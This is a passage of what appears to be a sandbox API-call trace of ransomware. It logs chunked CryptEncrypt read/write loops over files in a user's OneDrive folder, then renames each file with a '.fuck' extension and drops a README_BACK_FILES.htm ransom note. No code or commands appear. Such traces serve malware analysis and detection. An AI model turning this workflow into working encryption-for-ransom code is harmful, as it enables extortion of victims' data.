pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.653] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.653] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.654] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.654] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.654] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.654] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.654] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.654] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.655] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.655] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.655] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.655] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.655] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.655] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.656] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.656] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.656] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.656] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.656] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.657] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.657] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.657] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.657] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.657] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0274.657] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0274.657] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0274.658] CloseHandle (hObject=0x5d3c) returned 1 [0274.658] CloseHandle (hObject=0x5d48) returned 1 [0274.660] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.755] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.756] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.786] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.788] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0274.788] CryptDestroyKey (hKey=0x2fb7c8) returned 1 [0274.788] CryptReleaseContext (hProv=0x2f2a410, dwFlags=0x0) returned 1 [0274.788] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.788] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0274.810] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\readme_back_files.htm")) returned 0xffffffff [0274.810] AreFileApisANSI () returned 1 [0274.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.810] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.812] GetFileType (hFile=0x5d4c) returned 0x1 [0274.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.813] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.813] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.813] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.813] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.813] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.814] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.814] GetLastError () returned 0x0 [0274.814] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.815] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.816] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.817] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.818] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.818] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a168) returned 1 [0274.820] CryptCreateHash (in: hProv=0x2f2a168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: 